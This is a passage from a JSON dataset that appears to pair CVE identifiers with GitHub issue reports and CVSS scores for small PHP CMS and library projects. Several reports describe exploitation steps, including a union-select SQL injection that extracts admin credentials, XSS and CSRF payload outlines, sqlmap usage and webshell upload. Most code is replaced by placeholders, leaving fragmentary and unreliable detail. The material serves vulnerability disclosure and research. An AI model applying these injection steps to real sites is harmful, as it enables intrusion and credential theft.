  49278. "description": "SQL injection in FILETAG SQL injection in FILETAG APITAG The GET parameter \"id\" is passed without filtering to SQL sentence which causes the vulnerability.",
  49279. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49280. "severity": "CRITICAL",
  49281. "baseScore": 9.8,
  49282. "impactScore": 5.9,
  49283. "exploitabilityScore": 3.9
  49284. },
  49285. {
  49286. "CVE_ID": "CVE-2020-18121",
  49287. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/17",
  49288. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/17",
  49289. "Repo_new": "indexhibit/indexhibit",
  49290. "Issue_Created_At": "2019-02-14T04:27:30Z",
  49291. "description": "There is a improper configuration leads to getshell. There is a improper configuration leads to getshell. poc: first,let's sign in our indexhibit CMS,then we can see this choice APITAG FILETAG so,we can modify the plugins,include php APITAG modify: FILETAG we can use knife to connect: FILETAG",
  49292. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  49293. "severity": "HIGH",
  49294. "baseScore": 8.8,
  49295. "impactScore": 5.9,
  49296. "exploitabilityScore": 2.8
  49297. },
  49298. {
  49299. "CVE_ID": "CVE-2020-18123",
  49300. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/18",
  49301. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/18",
  49302. "Repo_new": "indexhibit/indexhibit",
  49303. "Issue_Created_At": "2019-02-16T14:04:55Z",
  49304. "description": "There is a CSRF vulnerability that can be deleted administrator account . Here is a CSRF attacks. poc: first,as we all know,when we install the website,the id of installer(inde NUMBERTAG is NUMBERTAG always means admin),so the id of inde NUMBERTAG is NUMBERTAG FILETAG ok,make id NUMBERTAG FILETAG let's refresh,we can see we have deleted the account of inde NUMBERTAG FILETAG",
  49305. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  49306. "severity": "MEDIUM",
  49307. "baseScore": 6.5,
  49308. "impactScore": 3.6,
  49309. "exploitabilityScore": 2.8
  49310. },
  49311. {
  49312. "CVE_ID": "CVE-2020-18124",
  49313. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/19",
  49314. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/19",
  49315. "Repo_new": "indexhibit/indexhibit",
  49316. "Issue_Created_At": "2019-02-16T14:22:07Z",
  49317. "description": "There is a CSRF vulnerability that can be reset password of any account. There is a CSRF vulnerability to reset password first,let's use this account: username=test and id NUMBERTAG In fact,we all know the id NUMBERTAG and username=inde NUMBERTAG is installer,but I have deleted.) FILETAG ok,poc: FILETAG ok,we reset the password of test and log in: FILETAG note:the exp we can get password by grab the return packet.",
  49318. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  49319. "severity": "MEDIUM",
  49320. "baseScore": 5.7,
  49321. "impactScore": 3.6,
  49322. "exploitabilityScore": 2.1
  49323. },
  49324. {
  49325. "CVE_ID": "CVE-2020-18125",
  49326. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/20",
  49327. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/20",
  49328. "Repo_new": "indexhibit/indexhibit",
  49329. "Issue_Created_At": "2019-02-17T12:24:16Z",
  49330. "description": "Reflected Cross Site Scripting(XSS) PATHTAG In page PATHTAG the POST function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse. Payload used: jxs=slideshow&i NUMBERTAG z= ERRORTAG Affected URL: FILETAG so,when we visit this PATHTAG and POST data: jxs=slideshow&i NUMBERTAG z= ERRORTAG The js will executes. FILETAG",
  49331. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49332. "severity": "MEDIUM",
  49333. "baseScore": 6.1,
  49334. "impactScore": 2.7,
  49335. "exploitabilityScore": 2.8
  49336. },
  49337. {
  49338. "CVE_ID": "CVE-2020-18126",
  49339. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/21",
  49340. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/21",
  49341. "Repo_new": "indexhibit/indexhibit",
  49342. "Issue_Created_At": "2019-02-19T21:44:56Z",
  49343. "description": "There are multiple cross site scripting (XSS) vulnerabilities in the management panel . There are two Stored XSS Vulnerabilities in the backstage We can make the Stored XSS via edit the Projects or Main poc: FILETAG FILETAG FILETAG FILETAG FILETAG",
  49344. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49345. "severity": "MEDIUM",
  49346. "baseScore": 5.4,
  49347. "impactScore": 2.7,
  49348. "exploitabilityScore": 2.3
  49349. },
  49350. {
  49351. "CVE_ID": "CVE-2020-18127",
  49352. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/22",
  49353. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/22",
  49354. "Repo_new": "indexhibit/indexhibit",
  49355. "Issue_Created_At": "2019-02-19T21:57:33Z",
  49356. "description": "There is a insecure permission so that we can read any file we want,include FILETAG . When we log in,we can view some css APITAG there is a insecure permission so that we can view any file. poc: URLTAG APITAG FILETAG APITAG parameter we put need Rigorous testing",
  49357. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  49358. "severity": "MEDIUM",
  49359. "baseScore": 6.5,
  49360. "impactScore": 3.6,
  49361. "exploitabilityScore": 2.8
  49362. },
  49363. {
  49364. "CVE_ID": "CVE-2020-18144",
  49365. "Issue_Url_old": "https://github.com/yundiao/ectouch/issues/1",
  49366. "Issue_Url_new": "https://github.com/yundiao/ectouch/issues/1",
  49367. "Repo_new": "yundiao/ectouch",
  49368. "Issue_Created_At": "2019-02-12T17:33:14Z",
  49369. "description": "Ectouch CMS Front end SQL Injection Vulnerability. I. Vulnerability Source Code Analysis NUMBERTAG Payload FILETAG APITAG Code payload with a URL (notice that there is a space before union): union select APITAG from ecs_admin_user order by goods_id asc In the latest version, payload will not be able to bring in SQL code without URL encoding. APITAG versions don't require URL encoding to be brought into payload execution; new versions only cause program execution errors, but can't bring in palyad NUMBERTAG ulnerability access file As can be seen from the URL request, the vulnerability entry file is: PATHTAG asynclist_list function. FILETAG $this APITAG fetch the parameter of integral_min from the URL REQUEST. APITAG bring the parameter in SQL operation NUMBERTAG APITAG function FILETAG APITAG function is located in PATHTAG controller. Using I function to get the parameters of integral_min. I function is located in PATHTAG The input parameters are obtained and filtered. FILETAG In function I, use DEFAULT_FILTER for filtering. It located in PATHTAG , and the value is htmlspecialchars. FILETAG Converted to single and double quotation marks, But payload does not need single or double quotes NUMBERTAG APITAG function Located in PATHTAG model. FILETAG There are no single or double quotation marks in the whole process. FILETAG II. Vulnerability Exploitation NUMBERTAG Special description: When accessed by a computer side browser, because of the file \u201c.htaccess\u201d at the root directory, will be denied access. Even just visiting the home page won't do. Because the file just redirects to APITAG No impact on testing and utilization. The name \".htaccess\" must be deleted or modified before it can be accessed in a computer browser. It does not affect the use of burpsuite to intercept mobile access APITAG access does not require modifying the file name). This test is after modifying the \".htaccess\" file name, tested on computer NUMBERTAG testing environment Windows + firefox + apache2 + APITAG environment\uff09 APITAG NUMBERTAG Payload FILETAG A\u3001 The end of the request must keep up with two \u201c \u201d\uff08two lines \uff09;otherwise, there is no response to the request. B\u3001 union select APITAG from ecs_admin_user order by goods_id asc APITAG is a space before nuion\uff09encode with url. C\u3001 Request url: GET APITAG HTTP NUMBERTAG FILETAG APITAG return \u201cadmin\u201d and APITAG After decode with MD5 is \u201cadmin\u201d. Get the administrator's account and password.",
  49370. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49371. "severity": "CRITICAL",
  49372. "baseScore": 9.8,
  49373. "impactScore": 5.9,
  49374. "exploitabilityScore": 3.9
  49375. },
  49376. {
  49377. "CVE_ID": "CVE-2020-18145",
  49378. "Issue_Url_old": "https://github.com/fex-team/umeditor/issues/624",
  49379. "Issue_Url_new": "https://github.com/fex-team/umeditor/issues/624",
  49380. "Repo_new": "fex-team/umeditor",
  49381. "Issue_Created_At": "2019-03-04T17:17:01Z",
  49382. "description": "I found a reflective XSS vulnerability in FILETAG . Testing environment: localhost Windows + firefox + APITAG + apache2 + APITAG I. Vulnerability analysis FILETAG FILETAG II. Exploit FILETAG url: FILETAG payload: APITAG APITAG // \"E\" in the word APITAG must be capitalized.",
  49383. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49384. "severity": "MEDIUM",
  49385. "baseScore": 6.1,
  49386. "impactScore": 2.7,
  49387. "exploitabilityScore": 2.8
  49388. },
  49389. {
  49390. "CVE_ID": "CVE-2020-18151",
  49391. "Issue_Url_old": "https://github.com/thinkcmf/thinkcmf/issues/580",
  49392. "Issue_Url_new": "https://github.com/thinkcmf/thinkcmf/issues/580",
  49393. "Repo_new": "thinkcmf/thinkcmf",
  49394. "Issue_Created_At": "2019-03-25T10:35:44Z",
  49395. "description": "I found a CSRF vulnerability to add an administrator. When an administrator clicks on a web page that contains the following content, a new administrator is added. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  49396. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  49397. "severity": "MEDIUM",
  49398. "baseScore": 6.5,
  49399. "impactScore": 3.6,
  49400. "exploitabilityScore": 2.8
  49401. },
  49402. {
  49403. "CVE_ID": "CVE-2020-18155",
  49404. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/817",
  49405. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/817",
  49406. "Repo_new": "intelliants/subrion",
  49407. "Issue_Created_At": "2019-04-03T10:24:41Z",
  49408. "description": "There is a time based sql injection if use PDO. I. Vulnerability Analysis Subrion CMS supports three ways of connecting mysql: mysql, mysqli and PDO. The default is mysqli. They are executed by three files in the PATHTAG directory. FILETAG FILETAG FILETAG If a website uses PDO connection, there will be a vulnerability. II. Vulnerability testing Using PDO connections requires modifying the file /includes/config. inc. php. Change mysqli to pdo. FILETAG In the search page: URLTAG POC and testing: APITAG FILETAG APITAG FILETAG APITAG FILETAG",
  49409. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49410. "severity": "CRITICAL",
  49411. "baseScore": 9.8,
  49412. "impactScore": 5.9,
  49413. "exploitabilityScore": 3.9
  49414. },
  49415. {
  49416. "CVE_ID": "CVE-2020-18175",
  49417. "Issue_Url_old": "https://github.com/sword1991912/metinfo/issues/1",
  49418. "Issue_Url_new": "https://github.com/291237388/metinfo/issues/1",
  49419. "Repo_new": "291237388/metinfo",
  49420. "Issue_Created_At": "2019-02-13T02:09:52Z",
  49421. "description": "There is a SQL inject vulnerability(limited by PHP ts). Analysis Look at APITAG there is a function called APITAG ERRORTAG we can APITAG to directly into the SQL statement For convenience of debugging\uff1a FILETAG FILETAG After that. visit the url\uff1a URLTAG FILETAG as u can see\uff0c APITAG has been inserted into SQL statement Then: URLTAG FILETAG Exploit key is the only restriction (from APITAG Called by auth class) If PHP ts: APITAG FILETAG elif PHP nts: FILETAG sqlmap tamper ERRORTAG Encode script( APITAG in sqlmap tamper): ERRORTAG Then run command CODETAG FILETAG APITAG register a member with user name \"tete\" by yourself or modify the script)",
  49422. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49423. "severity": "CRITICAL",
  49424. "baseScore": 9.8,
  49425. "impactScore": 5.9,
  49426. "exploitabilityScore": 3.9
  49427. },
  49428. {
  49429. "CVE_ID": "CVE-2020-18178",
  49430. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/11",
  49431. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/11",
  49432. "Repo_new": "neeke/hongcms",
  49433. "Issue_Created_At": "2019-02-12T05:35:19Z",
  49434. "description": "arbitrary file rewrite and read in Hongcms NUMBERTAG there is an arbitrary file read and rewrite in the backend of this cms via the link: PATHTAG when post params : APITAG FILETAG APITAG in the latest NUMBERTAG edtion, the cms try to use ajax to escape attacker to do same dangerous action like change file name etc but it can also be catched by proxy it will write your payload into any file which is writeable we create new file test.php to check this vuln: FILETAG we can access to it via link as URLTAG file name",
  49435. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49436. "severity": "CRITICAL",
  49437. "baseScore": 9.8,
  49438. "impactScore": 5.9,
  49439. "exploitabilityScore": 3.9
  49440. },
  49441. {
  49442. "CVE_ID": "CVE-2020-18184",
  49443. "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/320",
  49444. "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/320",
  49445. "Repo_new": "pluxml/pluxml",
  49446. "Issue_Created_At": "2019-02-17T15:41:37Z",
  49447. "description": "An issue in the theme edit function. The theme edit function PATHTAG allows remote attackers to execute arbitrary PHP code by placing this code into a template. Poc: CODETAG FILETAG APITAG FILETAG",
  49448. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  49449. "severity": "HIGH",
  49450. "baseScore": 7.2,
  49451. "impactScore": 5.9,
  49452. "exploitabilityScore": 1.2
  49453. },
  49454. {
  49455. "CVE_ID": "CVE-2020-18185",
  49456. "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/321",
  49457. "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/321",
  49458. "Repo_new": "pluxml/pluxml",
  49459. "Issue_Created_At": "2019-02-18T06:12:50Z",
  49460. "description": "An issue when the application run in a linux environment. FILETAG in APITAG allows attackers to execute arbitrary PHP code by modify the configuration file in a linux environment. Source PATHTAG line NUMBERTAG ERRORTAG Poc: CODETAG then visit FILETAG FILETAG",
  49461. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49462. "severity": "CRITICAL",
  49463. "baseScore": 9.8,
  49464. "impactScore": 5.9,
  49465. "exploitabilityScore": 3.9
  49466. },
  49467. {
  49468. "CVE_ID": "CVE-2020-18190",
  49469. "Issue_Url_old": "https://github.com/bludit/bludit/issues/978",
  49470. "Issue_Url_new": "https://github.com/bludit/bludit/issues/978",
  49471. "Repo_new": "bludit/bludit",
  49472. "Issue_Created_At": "2019-03-05T02:50:16Z",
  49473. "description": "Arbitrary File Delete Security. Hi There. I found Bludit NUMBERTAG allows remote attackers to delete arbitrary files via PATHTAG payload: ERRORTAG then the file PATHTAG will be deleted.",
  49474. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  49475. "severity": "CRITICAL",
  49476. "baseScore": 9.1,
  49477. "impactScore": 5.2,
  49478. "exploitabilityScore": 3.9
  49479. },
  49480. {
  49481. "CVE_ID": "CVE-2020-18191",
  49482. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303",
  49483. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1303",
  49484. "Repo_new": "getsimplecms/getsimplecms",
  49485. "Issue_Created_At": "2019-03-05T08:11:53Z",
  49486. "description": "Arbitrary File Delete Security. Hi There. I found APITAG NUMBERTAG allows remote attackers to delete arbitrary files via PATHTAG payload: CODETAG then the file FILETAG will be deleted.",
  49487. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  49488. "severity": "CRITICAL",
  49489. "baseScore": 9.1,
  49490. "impactScore": 5.2,
  49491. "exploitabilityScore": 3.9
  49492. },
  49493. {
  49494. "CVE_ID": "CVE-2020-18220",
  49495. "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/190",
  49496. "Issue_Url_new": "https://github.com/doramart/doracms/issues/190",
  49497. "Repo_new": "doramart/doracms",
  49498. "Issue_Created_At": "2019-02-19T18:17:06Z",
  49499. "description": "Hardcoded key vulnerability usage of static salt . Application uses static key when performing encryption which makes it easier for an attacker to conduct brute force password guessing. Affected URL: FILETAG const APITAG = \"doracms_\"; const MD5key = \"dora\"; export default { AES: { encrypt: (message) => {//\u52a0\u5bc6 return APITAG APITAG { mode: APITAG padding: APITAG APITAG }, Affected URL: FILETAG if APITAG { APITAG = APITAG APITAG } Solution: APITAG = function(message, password) { var salt = APITAG var key = APITAG salt NUMBERTAG ar iv = APITAG var cipher = APITAG CBC', key); APITAG iv}); APITAG APITAG var APITAG = APITAG return {cipher_text: APITAG salt: APITAG iv: APITAG } Source: URLTAG URLTAG",
  49500. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49501. "severity": "HIGH",
  49502. "baseScore": 7.5,
  49503. "impactScore": 3.6,
  49504. "exploitabilityScore": 3.9
  49505. },
  49506. {
  49507. "CVE_ID": "CVE-2020-18221",
  49508. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2204",
  49509. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2204",
  49510. "Repo_new": "typora/typora-issues",
  49511. "Issue_Created_At": "2019-02-20T02:08:33Z",
  49512. "description": "APITAG XSS to RCE. Tested On Windows NUMBERTAG APITAG FILETAG XSS: ERRORTAG FILETAG FILETAG RCE: ERRORTAG FILETAG FILETAG",
  49513. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49514. "severity": "MEDIUM",
  49515. "baseScore": 6.1,
  49516. "impactScore": 2.7,
  49517. "exploitabilityScore": 2.8
  49518. },
  49519. {
  49520. "CVE_ID": "CVE-2020-18229",
  49521. "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/4",
  49522. "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/4",
  49523. "Repo_new": "PearlyNautilus/Security-Code-Review",
  49524. "Issue_Created_At": "2019-03-08T07:49:52Z",
  49525. "description": "APITAG There are two xss vulnerabilities in APITAG NUMBERTAG FILETAG , parameter $cfg_copyright. Demo: Login in administrator panel and insert payload as follows: FILETAG Save it and you can see in data package. FILETAG Then,visit index page FILETAG view source: FILETAG NUMBERTAG FILETAG , parameter $cfg_switchshow. Demo: Login in administrator panel and insert payload as follows:(It's necessary to close site.) FILETAG Save it and you can see in data package. FILETAG Visit index page. FILETAG view source: FILETAG Fix: Filter the $cfg_copyright and $cfg_switchshow with function APITAG",
  49526. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49527. "severity": "MEDIUM",
  49528. "baseScore": 4.8,
  49529. "impactScore": 2.7,
  49530. "exploitabilityScore": 1.7
  49531. },
  49532. {
  49533. "CVE_ID": "CVE-2020-18259",
  49534. "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/1",
  49535. "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/1",
  49536. "Repo_new": "chilin89117/ED01-CMS",
  49537. "Issue_Created_At": "2019-06-13T01:37:59Z",
  49538. "description": "Two xss vulnerabilities NUMBERTAG There is a reflective xss on the search page FILETAG . Poc: APITAG FILETAG NUMBERTAG In the background, you can enter the stored xss by writing an APITAG poc in Posts APITAG Content or Post Title: APITAG Post status select Publish,when entering the home page,xss will be triggered. FILETAG FILETAG",
  49539. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49540. "severity": "MEDIUM",
  49541. "baseScore": 6.1,
  49542. "impactScore": 2.7,
  49543. "exploitabilityScore": 2.8
  49544. },
  49545. {
  49546. "CVE_ID": "CVE-2020-18261",
  49547. "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/2",
  49548. "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/2",
  49549. "Repo_new": "chilin89117/ED01-CMS",
  49550. "Issue_Created_At": "2019-06-13T02:17:19Z",
  49551. "description": "File upload APITAG can be uploaded and trigger remote command execution. When writing an article in the background\uff0cyou can upload a webshell via file upload vulnerability in the image upload. Poc: APITAG FILETAG FILETAG FILETAG",
  49552. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49553. "severity": "CRITICAL",
  49554. "baseScore": 9.8,
  49555. "impactScore": 5.9,
  49556. "exploitabilityScore": 3.9
  49557. },
  49558. {
  49559. "CVE_ID": "CVE-2020-18262",
  49560. "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/3",
  49561. "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/3",
  49562. "Repo_new": "chilin89117/ED01-CMS",
  49563. "Issue_Created_At": "2019-06-13T02:29:06Z",
  49564. "description": "There is a SQL injection vulnerability in the page FILETAG . When you click categories, the website interacts with the database via the FILETAG page cid parameter, where there is a SQL injection APITAG can enter the database through sqlmap. APITAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  49565. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49566. "severity": "CRITICAL",
  49567. "baseScore": 9.8,
  49568. "impactScore": 5.9,
  49569. "exploitabilityScore": 3.9
  49570. },
  49571. {
  49572. "CVE_ID": "CVE-2020-18263",
  49573. "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/1",
  49574. "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/1",
  49575. "Repo_new": "harshitbansal373/php-cms",
  49576. "Issue_Created_At": "2019-06-14T09:29:32Z",
  49577. "description": "SQL injection vulnerability in FILETAG . In APITAG a SQL injection vulnerability in APITAG parameter is transmitted using POST,you can use sqlmap to enter the database. CODETAG FILETAG FILETAG FILETAG",
  49578. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49579. "severity": "HIGH",
  49580. "baseScore": 7.5,
  49581. "impactScore": 3.6,
  49582. "exploitabilityScore": 3.9
  49583. },
  49584. {
  49585. "CVE_ID": "CVE-2020-18265",
  49586. "Issue_Url_old": "https://github.com/github123abc123/bird/issues/1",
  49587. "Issue_Url_new": "https://github.com/github123abc123/bird/issues/1",
  49588. "Repo_new": "github123abc123/bird",
  49589. "Issue_Created_At": "2019-02-26T02:01:49Z",
  49590. "description": "One CSRF vulnerability in Simple Log NUMBERTAG An issue was discovered in Simple Log NUMBERTAG There is a CSRF vulnerability that can add Administrator Account in the ' APITAG Add Administrator Account Poc\uff1a Create account\uff1atest3 password:a NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  49591. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  49592. "severity": "HIGH",
  49593. "baseScore": 8.8,
  49594. "impactScore": 5.9,
  49595. "exploitabilityScore": 2.8
  49596. },
  49597. {
  49598. "CVE_ID": "CVE-2020-18268",
  49599. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/209",
  49600. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/209",
  49601. "Repo_new": "zblogcn/zblogphp",
  49602. "Issue_Created_At": "2019-02-19T07:18:24Z",
  49603. "description": "\u91cd\u5b9a\u5411\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG NUMBERTAG get\u53c2\u6570redirect\u5e76\u7528\u4f5c\u91cd\u5b9a\u5411\u7684\u8def\u5f84 FILETAG PATHTAG FILETAG",
  49604. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49605. "severity": "MEDIUM",
  49606. "baseScore": 6.1,
  49607. "impactScore": 2.7,
  49608. "exploitabilityScore": 2.8
  49609. },
  49610. {
  49611. "CVE_ID": "CVE-2020-18268",
  49612. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/216",
  49613. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/216",
  49614. "Repo_new": "zblogcn/zblogphp",
  49615. "Issue_Created_At": "2019-04-04T06:05:11Z",
  49616. "description": "Z APITAG NUMBERTAG Open redirect vulnerability. Z APITAG NUMBERTAG has an Open Redirect via the FILETAG redirect parameter. Open Redirection vulnerability Technical details: URL : FILETAG Parameter Name : redirect Parameter Type : GET Attack Pattern : FILETAG Should there be anything else we can help you with, please do not hesitate to ask.",
  49617. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49618. "severity": "MEDIUM",
  49619. "baseScore": 6.1,
  49620. "impactScore": 2.7,
  49621. "exploitabilityScore": 2.8
  49622. },
  49623. {
  49624. "CVE_ID": "CVE-2020-18392",
  49625. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/106",
  49626. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/106",
  49627. "Repo_new": "cesanta/mjs",
  49628. "Issue_Created_At": "2018-07-03T06:21:09Z",
  49629. "description": "APITAG stack overflow at APITAG POCs: FILETAG FILETAG ASAN output: ERRORTAG",
  49630. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  49631. "severity": "MEDIUM",
  49632. "baseScore": 5.5,
  49633. "impactScore": 3.6,
  49634. "exploitabilityScore": 1.8
  49635. },
  49636. {
  49637. "CVE_ID": "CVE-2020-18428",
  49638. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/109",
  49639. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/109",
  49640. "Repo_new": "syoyo/tinyexr",
  49641. "Issue_Created_At": "2019-03-05T02:30:27Z",
  49642. "description": "Out of range in function APITAG APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a out of range has triggered. (gdb) bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6aba NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff7ad NUMBERTAG b7 in ?? () from PATHTAG NUMBERTAG ffff7adea NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff7adea NUMBERTAG in APITAG () from PATHTAG NUMBERTAG ffff7adec NUMBERTAG in __cxa_throw () from PATHTAG NUMBERTAG ffff7ada7b5 in ?? () from PATHTAG NUMBERTAG df NUMBERTAG in std::vector<float, std::allocator APITAG >::_M_range_check (this=<optimized out>, __n NUMBERTAG at PATHTAG NUMBERTAG std::vector<float, std::allocator APITAG >::at (this=<optimized out>, __n NUMBERTAG at PATHTAG NUMBERTAG APITAG (data=<optimized out>, width NUMBERTAG height NUMBERTAG components NUMBERTAG save_as_fp NUMBERTAG outfilename NUMBERTAG f NUMBERTAG e0 APITAG APITAG err=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG c in main (argc=<optimized out>, argv=<optimized out>) at APITAG",
  49643. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  49644. "severity": "HIGH",
  49645. "baseScore": 7.5,
  49646. "impactScore": 3.6,
  49647. "exploitabilityScore": 3.9
  49648. },
  49649. {
  49650. "CVE_ID": "CVE-2020-18430",
  49651. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/108",
  49652. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/108",
  49653. "Repo_new": "syoyo/tinyexr",
  49654. "Issue_Created_At": "2019-03-05T02:30:06Z",
  49655. "description": "Out of memory in function APITAG APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a out of memory has triggered NUMBERTAG ERROR: APITAG allocator is out of memory trying to allocate NUMBERTAG f NUMBERTAG b NUMBERTAG bytes NUMBERTAG f2bb2 in operator new(unsigned long) ( PATHTAG NUMBERTAG a in APITAG long>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG a in APITAG long> APITAG long>&, unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> APITAG long, std::allocator<unsigned long> const&) PATHTAG NUMBERTAG a in std::vector<unsigned long, std::allocator<unsigned long> >::vector(unsigned long, std::allocator<unsigned long> const&) PATHTAG NUMBERTAG a in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const ) PATHTAG NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG ee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG HINT: if you don't care about these errors you may set allocator_may_return_null NUMBERTAG SUMMARY: APITAG out of memory ( PATHTAG ) in operator new(unsigned long NUMBERTAG ABORTING",
  49656. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  49657. "severity": "HIGH",
  49658. "baseScore": 7.5,
  49659. "impactScore": 3.6,
  49660. "exploitabilityScore": 3.9
  49661. },
  49662. {
  49663. "CVE_ID": "CVE-2020-18438",
  49664. "Issue_Url_old": "https://github.com/qinggan/phpok/issues/4",
  49665. "Issue_Url_new": "https://github.com/qinggan/phpok/issues/4",
  49666. "Repo_new": "qinggan/phpok",
  49667. "Issue_Created_At": "2019-03-06T06:25:51Z",
